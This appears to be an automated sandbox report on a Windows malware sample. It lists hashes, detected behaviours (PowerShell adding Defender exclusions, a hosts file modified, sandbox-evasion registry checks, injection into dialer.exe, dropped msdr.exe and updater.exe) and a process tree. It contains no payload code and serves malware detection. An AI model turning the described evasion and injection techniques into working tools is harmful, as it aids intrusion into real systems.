Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 03:56
Static task
static1
Behavioral task
behavioral1
Sample
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
Resource
win11-20240508-en
General
-
Target
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
-
Size
96KB
-
MD5
3a60efc9992d02574b59745cbdfb2334
-
SHA1
28d4ef82fc79c586b1e32995789a84c1043a9c55
-
SHA256
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994
-
SHA512
2fb2b6983040a9b747748b1e4d7c0e88e06e39a364ab8bbef2f4ee06c9f3a84cbe4ec1112ae5640ab98c3dc8a1a9bbc52ee63ac652cdd4f34c5e1e76784618ea
-
SSDEEP
1536:xcx9ZYLP8rNqbfNqGEkLepf3NW7d9NE768l0e+SzF6JL5FhA7g/LSCvsW90VcdP0:xcqmqhkEeF3NWf8l0edFEhMgzgkP+vpP
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 3508 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3628 powershell.exe 2624 powershell.exe 2420 powershell.exe 3508 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\etc\hosts msdr.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 2 IoCs
pid Process 4728 msdr.exe 3604 updater.exe -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File created C:\Windows\SysWOW64\msdr.exe powershell.exe File opened for modification C:\Windows\system32\MRT.exe msdr.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4728 set thread context of 2188 4728 msdr.exe 109 PID 3604 set thread context of 1728 3604 updater.exe 131 PID 3604 set thread context of 4024 3604 updater.exe 132 PID 3604 set thread context of 3036 3604 updater.exe 136 -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4612 sc.exe 4516 sc.exe 680 sc.exe 3680 sc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 60 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7EFE0617-D683-4C35-884A-21AB35BE4EA0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 03 Jun 2024 03:57:39 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717387058" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2420 powershell.exe 2420 powershell.exe 3508 powershell.exe 3508 powershell.exe 948 powershell.exe 948 powershell.exe 4728 msdr.exe 3628 powershell.exe 3628 powershell.exe 4728 msdr.exe 4728 msdr.exe 4728 msdr.exe 4728 msdr.exe 4728 msdr.exe 4728 msdr.exe 4728 msdr.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 4728 msdr.exe 4728 msdr.exe 4728 msdr.exe 2188 dialer.exe 2188 dialer.exe 3604 updater.exe 2188 dialer.exe 2188 dialer.exe 2624 powershell.exe 2188 dialer.exe 2188 dialer.exe 2624 powershell.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2624 powershell.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2624 powershell.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2624 powershell.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe 2188 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 3508 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 2188 dialer.exe Token: SeShutdownPrivilege 4476 powercfg.exe Token: SeCreatePagefilePrivilege 4476 powercfg.exe Token: SeShutdownPrivilege 3840 powercfg.exe Token: SeCreatePagefilePrivilege 3840 powercfg.exe Token: SeShutdownPrivilege 3440 powercfg.exe Token: SeCreatePagefilePrivilege 3440 powercfg.exe Token: SeShutdownPrivilege 4912 powercfg.exe Token: SeCreatePagefilePrivilege 4912 powercfg.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2320 svchost.exe Token: SeIncreaseQuotaPrivilege 2320 svchost.exe Token: SeSecurityPrivilege 2320 svchost.exe Token: SeTakeOwnershipPrivilege 2320 svchost.exe Token: SeLoadDriverPrivilege 2320 svchost.exe Token: SeSystemtimePrivilege 2320 svchost.exe Token: SeBackupPrivilege 2320 svchost.exe Token: SeRestorePrivilege 2320 svchost.exe Token: SeShutdownPrivilege 2320 svchost.exe Token: SeSystemEnvironmentPrivilege 2320 svchost.exe Token: SeUndockPrivilege 2320 svchost.exe Token: SeManageVolumePrivilege 2320 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2320 svchost.exe Token: SeIncreaseQuotaPrivilege 2320 svchost.exe Token: SeSecurityPrivilege 2320 svchost.exe Token: SeTakeOwnershipPrivilege 2320 svchost.exe Token: SeLoadDriverPrivilege 2320 svchost.exe Token: SeSystemtimePrivilege 2320 svchost.exe Token: SeBackupPrivilege 2320 svchost.exe Token: SeRestorePrivilege 2320 svchost.exe Token: SeShutdownPrivilege 2320 svchost.exe Token: SeSystemEnvironmentPrivilege 2320 svchost.exe Token: SeUndockPrivilege 2320 svchost.exe Token: SeManageVolumePrivilege 2320 svchost.exe Token: SeAuditPrivilege 2780 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2320 svchost.exe Token: SeIncreaseQuotaPrivilege 2320 svchost.exe Token: SeSecurityPrivilege 2320 svchost.exe Token: SeTakeOwnershipPrivilege 2320 svchost.exe Token: SeLoadDriverPrivilege 2320 svchost.exe Token: SeSystemtimePrivilege 2320 svchost.exe Token: SeBackupPrivilege 2320 svchost.exe Token: SeRestorePrivilege 2320 svchost.exe Token: SeShutdownPrivilege 2320 svchost.exe Token: SeSystemEnvironmentPrivilege 2320 svchost.exe Token: SeUndockPrivilege 2320 svchost.exe Token: SeManageVolumePrivilege 2320 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2320 svchost.exe Token: SeIncreaseQuotaPrivilege 2320 svchost.exe Token: SeSecurityPrivilege 2320 svchost.exe Token: SeTakeOwnershipPrivilege 2320 svchost.exe Token: SeLoadDriverPrivilege 2320 svchost.exe Token: SeSystemtimePrivilege 2320 svchost.exe Token: SeBackupPrivilege 2320 svchost.exe Token: SeRestorePrivilege 2320 svchost.exe Token: SeShutdownPrivilege 2320 svchost.exe Token: SeSystemEnvironmentPrivilege 2320 svchost.exe Token: SeUndockPrivilege 2320 svchost.exe Token: SeManageVolumePrivilege 2320 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2320 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4676 wrote to memory of 2420 4676 DllHost.exe 85 PID 4676 wrote to memory of 2420 4676 DllHost.exe 85 PID 4676 wrote to memory of 2420 4676 DllHost.exe 85 PID 4676 wrote to memory of 3508 4676 DllHost.exe 87 PID 4676 wrote to memory of 3508 4676 DllHost.exe 87 PID 4676 wrote to memory of 3508 4676 DllHost.exe 87 PID 4236 wrote to memory of 948 4236 DllHost.exe 97 PID 4236 wrote to memory of 948 4236 DllHost.exe 97 PID 4236 wrote to memory of 948 4236 DllHost.exe 97 PID 948 wrote to memory of 4728 948 powershell.exe 99 PID 948 wrote to memory of 4728 948 powershell.exe 99 PID 4728 wrote to memory of 2188 4728 msdr.exe 109 PID 4728 wrote to memory of 2188 4728 msdr.exe 109 PID 4728 wrote to memory of 2188 4728 msdr.exe 109 PID 4728 wrote to memory of 2188 4728 msdr.exe 109 PID 4728 wrote to memory of 2188 4728 msdr.exe 109 PID 4728 wrote to memory of 2188 4728 msdr.exe 109 PID 4728 wrote to memory of 2188 4728 msdr.exe 109 PID 2040 wrote to memory of 3944 2040 cmd.exe 116 PID 2040 wrote to memory of 3944 2040 cmd.exe 116 PID 2188 wrote to memory of 620 2188 dialer.exe 5 PID 2188 wrote to memory of 668 2188 dialer.exe 7 PID 2188 wrote to memory of 960 2188 dialer.exe 12 PID 2188 wrote to memory of 336 2188 dialer.exe 13 PID 2188 wrote to memory of 512 2188 dialer.exe 14 PID 668 wrote to memory of 2808 668 lsass.exe 50 PID 2188 wrote to memory of 872 2188 dialer.exe 15 PID 2188 wrote to memory of 1076 2188 dialer.exe 16 PID 2188 wrote to memory of 1088 2188 dialer.exe 17 PID 2188 wrote to memory of 1180 2188 dialer.exe 19 PID 2188 wrote to memory of 1192 2188 dialer.exe 20 PID 2188 wrote to memory of 1280 2188 dialer.exe 21 PID 2188 wrote to memory of 1312 2188 dialer.exe 22 PID 2188 wrote to memory of 1368 2188 dialer.exe 23 PID 2188 wrote to memory of 1420 2188 dialer.exe 24 PID 2188 wrote to memory of 1484 2188 dialer.exe 25 PID 2188 wrote to memory of 1496 2188 dialer.exe 26 PID 2188 wrote to memory of 1516 2188 dialer.exe 27 PID 2188 wrote to memory of 1632 2188 dialer.exe 28 PID 2188 wrote to memory of 1700 2188 dialer.exe 29 PID 2188 wrote to memory of 1752 2188 dialer.exe 30 PID 2188 wrote to memory of 1808 2188 dialer.exe 31 PID 2188 wrote to memory of 1840 2188 dialer.exe 32 PID 2188 wrote to memory of 1924 2188 dialer.exe 33 PID 2188 wrote to memory of 1932 2188 dialer.exe 34 PID 2188 wrote to memory of 1996 2188 dialer.exe 35 PID 2188 wrote to memory of 2016 2188 dialer.exe 36 PID 2188 wrote to memory of 1764 2188 dialer.exe 37 PID 2188 wrote to memory of 2140 2188 dialer.exe 39 PID 2188 wrote to memory of 2256 2188 dialer.exe 40 PID 2188 wrote to memory of 2320 2188 dialer.exe 41 PID 2188 wrote to memory of 2468 2188 dialer.exe 42 PID 2188 wrote to memory of 2476 2188 dialer.exe 43 PID 2188 wrote to memory of 2484 2188 dialer.exe 44 PID 2188 wrote to memory of 2496 2188 dialer.exe 45 PID 2188 wrote to memory of 2704 2188 dialer.exe 46 PID 2188 wrote to memory of 2712 2188 dialer.exe 47 PID 2188 wrote to memory of 2760 2188 dialer.exe 48 PID 2188 wrote to memory of 2780 2188 dialer.exe 49 PID 2188 wrote to memory of 2808 2188 dialer.exe 50 PID 2188 wrote to memory of 2836 2188 dialer.exe 51 PID 668 wrote to memory of 2808 668 lsass.exe 50 PID 668 wrote to memory of 2808 668 lsass.exe 50 PID 668 wrote to memory of 2808 668 lsass.exe 50
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1192
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2760
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1484
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2484
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1496
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2016
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2844
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3520
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3560
-
C:\Users\Admin\AppData\Local\Temp\397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe"C:\Users\Admin\AppData\Local\Temp\397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe"2⤵PID:3220
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3740
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3968
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1392
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4148
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1016
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5000
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2888
-
